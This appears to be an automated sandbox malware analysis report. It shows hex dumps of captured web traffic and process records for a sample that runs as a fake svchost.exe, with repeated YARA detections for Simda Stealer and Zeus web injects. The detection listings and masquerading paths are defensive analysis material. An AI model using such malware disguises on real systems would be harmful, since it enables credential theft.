                                                                                                                                                                                                          2024-09-08 08:54:09 UTC1369INData Raw: 32 30 33 34 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d
                                                                                                                                                                                                          Data Ascii: 2034000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-
                                                                                                                                                                                                          2024-09-08 08:54:09 UTC1369INData Raw: 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 7b 6f 76 65 72 66
                                                                                                                                                                                                          Data Ascii: amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{overf
                                                                                                                                                                                                          2024-09-08 08:54:09 UTC1369INData Raw: 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a 6e 6f 74 28 5b 64 69 73 74 61 6e 63 65 5d 29 3a 6e 6f 74 28 5b 61 63 74 69 76 65 5d 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 30 76 68 29 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e 69 6e 70 75 74 2c 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c
                                                                                                                                                                                                          Data Ascii: ader-background{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autocompl
                                                                                                                                                                                                          2024-09-08 08:54:09 UTC1369INData Raw: 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 69 6e 74 72 69 6e 73 69 63 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 69
                                                                                                                                                                                                          Data Ascii: th][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container,.i
                                                                                                                                                                                                          2024-09-08 08:54:09 UTC1369INData Raw: 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 72 69 67 68 74 3a 30 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 72 65 70 6c 61 63 65 64 2d 63 6f 6e 74 65 6e 74 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 74 6f 70 3a 30 70 78 21 69 6d 70 6f 72 74 61
                                                                                                                                                                                                          Data Ascii: ml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:0;bottom:0;right:0}.i-amphtml-replaced-content,.i-amphtml-screen-reader{padding:0!important;border:none!important}.i-amphtml-screen-reader{position:fixed!important;top:0px!importa
                                                                                                                                                                                                          2024-09-08 08:54:09 UTC1369INData Raw: 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3e 69 6d 67 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 2c 5b 77 69 64 74 68 5d
                                                                                                                                                                                                          Data Ascii: ([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width]
                                                                                                                                                                                                          2024-09-08 08:54:09 UTC1369INData Raw: 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 61 74 74 72 28 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 29 7d 69 2d 61 6d 70 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 2c 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74
                                                                                                                                                                                                          Data Ascii: ery{display:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;t
                                                                                                                                                                                                          2024-09-08 08:54:09 UTC1369INData Raw: 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 29 7b 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63 74 69 6f 6e 29 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 66 65 66 65 66 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 66 64 66 64 66 7d 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72
                                                                                                                                                                                                          Data Ascii: or],form [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid #dfdfdf}:where(amp-accor
                                                                                                                                                                                                          2024-09-08 08:54:09 UTC1369INData Raw: 2f 76 30 2e 6d 6a 73 22 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 6e 6f 6d 6f 64 75 6c 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2f 61 6d 70 2d 62 69 6e 64 2d 30 2e 31 2e 6d 6a 73 22 20 61 73 79 6e 63 3d 22 22 20 63 75 73 74 6f 6d 2d 65 6c 65 6d 65 6e 74 3d 22 61 6d 70 2d 62 69 6e 64 22 20 74 79 70 65 3d 22 6d 6f
                                                                                                                                                                                                          Data Ascii: /v0.mjs" type="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0.js" crossorigin="anonymous"></script><script src="https://cdn.ampproject.org/v0/amp-bind-0.1.mjs" async="" custom-element="amp-bind" type="mo


                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:04:52:30
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Users\user\Desktop\OjKmJJm2YT.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\OjKmJJm2YT.exe"
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:216'576 bytes
                                                                                                                                                                                                          MD5 hash:CA30350FDB8B854ABAC0A08AA08FF89A
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                          Start time:04:52:31
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Windows\apppatch\svchost.exe"
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:216'576 bytes
                                                                                                                                                                                                          MD5 hash:3AFDB594A34F95485CA05A57DFEF80CC
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1740729143.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1734478353.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1743033227.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1680369624.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.1339491124.0000000000883000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1339491124.0000000000883000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2594045872.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1733978576.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1722129332.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1674029436.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1342128080.0000000002AB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1739375869.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.1339398735.0000000000883000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1339398735.0000000000883000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1675730840.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1742192775.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1738952531.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1745221620.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1716460061.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1744096234.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1739760452.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1673174622.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1707472657.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1710147215.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1740206618.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1678394504.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1736767365.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1737316338.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2594045872.0000000002A56000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1703776736.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1741195616.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1690060462.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1730745096.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2594339878.0000000002C13000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1746920664.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1734938590.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1713404140.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1747674947.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1745970801.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1726563792.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1744700906.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                          Start time:04:53:05
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1781805646.0000000000630000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1782040973.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

